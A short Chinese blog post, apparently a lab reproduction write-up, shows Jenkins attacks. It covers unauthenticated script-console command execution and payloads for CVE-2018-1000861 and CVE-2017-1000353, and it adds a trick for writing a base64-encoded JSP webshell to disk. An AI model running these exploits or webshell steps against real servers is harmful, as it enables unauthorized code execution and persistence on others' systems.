博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Jenkins漏洞利用复现
阅读量:4316 次
发布时间:2019-06-06

本文共 809 字,大约阅读时间需要 2 分钟。

一、未授权访问

访问url:

http://172.16.20.134:8080/script

 

 

 

命令执行

println "ls -al".execute().text

也可以利用powershell 或者python脚本反弹shell

 

 

 

二、CVE-2018-1000861 远程命令执行漏洞

payload:

securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {  public x(){    "touch /tmp/success".execute()  }}

  

 

&value=转成url编码

发送get请求:

 

python脚本:

https://github.com/orangetw/awesome-jenkins-rce-2019/blob/master/exp.py

  

 

三、CVE-2017-1000353 远程代码执行

工具地址:

 

# 生成serjava -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar 1.ser "touch /tmp/1.jsp"# 发送serpython exploit.py http://172.16.20.134:8080 1.ser

 

exploit.py这里要注释下,如果你使用代理的话可以添加,这里只是复现,用不到

 另外一个linux写shell的小技巧:

echo base64后的木马内容 |base64 -d > 1.jsp

 

jsp生成成功

 

 

四、

 

转载于:https://www.cnblogs.com/junsec/p/11593556.html

你可能感兴趣的文章
应用程序缓存的应用(摘抄)
查看>>
jQuery基础知识,很赞的!!!
查看>>
[Codevs] 线段树练习5
查看>>
Amazon
查看>>
component-based scene model
查看>>
Echart输出图形
查看>>
hMailServer搭建简单邮件系统
查看>>
从零开始学习jQuery
查看>>
Spring+SpringMVC+MyBatis深入学习及搭建(四)——MyBatis输入映射与输出映射
查看>>
opacity半透明兼容ie8。。。。ie8半透明
查看>>
CDOJ_24 八球胜负
查看>>
Alpha 冲刺 (7/10)
查看>>
一款jQuery打造的具有多功能切换的幻灯片特效
查看>>
SNMP从入门到开发:进阶篇
查看>>
@ServletComponentScan ,@ComponentScan,@Configuration 解析
查看>>
unity3d 射弹基础案例代码分析
查看>>
thinksns 分页数据
查看>>
os模块
查看>>
LINQ to SQL vs. NHibernate
查看>>
基于Angular5和WebAPI的增删改查(一)
查看>>